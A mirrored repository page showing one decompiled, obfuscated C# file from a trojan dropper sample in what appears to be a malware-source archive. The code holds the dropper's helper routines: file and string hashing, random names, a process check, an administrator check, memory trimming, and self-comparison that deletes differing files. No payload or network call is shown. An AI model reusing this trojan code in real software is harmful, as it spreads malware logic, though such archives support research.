ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 11:26:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Trojan-Dropper/Win32/S/Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024/_0008/_0008.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

82 lines
2.5 KiB
C#
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

// Decompiled with JetBrains decompiler
// Type: .
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
using \u0001;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Security.Principal;
using System.Text;
namespace \u0008
{
internal sealed class \u0008
{
[NonSerialized]
internal static \u0002 \u0001;
public void \u000F()
{
GC.Collect();
GC.WaitForPendingFinalizers();
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
\u0008.\u0008.\u000F(Process.GetCurrentProcess().Handle, -1, -1);
}
public bool \u000F([In] string obj0) => Process.GetProcessesByName(obj0).Length > 0;
private string \u000F([In] string obj0)
{
FileStream inputStream = File.OpenRead(obj0);
byte[] hash = new MD5CryptoServiceProvider().ComputeHash((Stream) inputStream);
inputStream.Close();
return BitConverter.ToString(hash).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
}
public string \u0010([In] string obj0) => BitConverter.ToString(new MD5CryptoServiceProvider().ComputeHash(Encoding.Default.GetBytes(obj0))).Replace(\u0008.\u0008.\u0001(1891), \u0008.\u0008.\u0001(948)).ToUpper();
public string \u000F([In] int obj0)
{
Random random = new Random();
string str = \u0008.\u0008.\u0001(2571);
string empty = string.Empty;
for (int index = 0; index < obj0; ++index)
empty += str.Substring(random.Next(0, str.Length), 1);
return empty;
}
public bool \u0010([In] string obj0)
{
if (!File.Exists(obj0))
return false;
if (!(this.\u000F(obj0) != this.\u000F(Process.GetCurrentProcess().MainModule.FileName)))
return true;
File.Delete(obj0);
return false;
}
public bool \u000F()
{
try
{
return new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator);
}
catch
{
return false;
}
}
[DllImport("kernel32.dll", EntryPoint = "SetProcessWorkingSetSize")]
private static extern int \u000F([In] IntPtr obj0, [In] int obj1, [In] int obj2);
static \u0008() => \u0003.\u000F();
}
}
Reference in New Issue View Git Blame Copy Permalink